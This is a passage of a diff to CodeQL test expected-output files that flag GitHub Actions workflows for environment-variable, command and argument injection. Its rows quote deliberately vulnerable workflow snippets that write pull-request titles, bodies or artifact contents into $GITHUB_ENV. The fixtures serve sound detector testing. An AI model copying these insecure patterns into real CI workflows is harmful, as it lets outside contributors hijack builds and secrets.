"${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | .github/workflows/test3.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | .github/workflows/test5.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | .github/workflows/test6.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | .github/workflows/test6.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | .github/workflows/test6.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test7.yml:16:9:24:35 | Uses Step | .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test7.yml:16:9:24:35 | Uses Step | Uses Step | .github/workflows/test7.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | .github/workflows/test8.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | .github/workflows/test9.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | cat foo/.github/java-config.env >> $GITHUB_ENV | .github/workflows/test10.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test11.yml:15:9:21:6 | Uses Step | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test11.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:3:3:3:21 | pull_request_target | pull_request_target | +| .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:3:3:3:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | .github/workflows/test16.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | .github/workflows/test16.yml:4:3:4:14 | workflow_run | workflow_run | diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected b/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected index decabad082fb..281fd39552a7 100644 --- a/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected @@ -3,4 +3,4 @@ nodes | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths #select -| .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | Potential command injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | Potential command injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | diff --git a/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected index bd0684d17117..5eddb791ae5c 100644 --- a/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected @@ -21,15 +21,15 @@ nodes | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | subpaths #select -| .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | sed | -| .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | Potential argument injection in $@ command, which may be 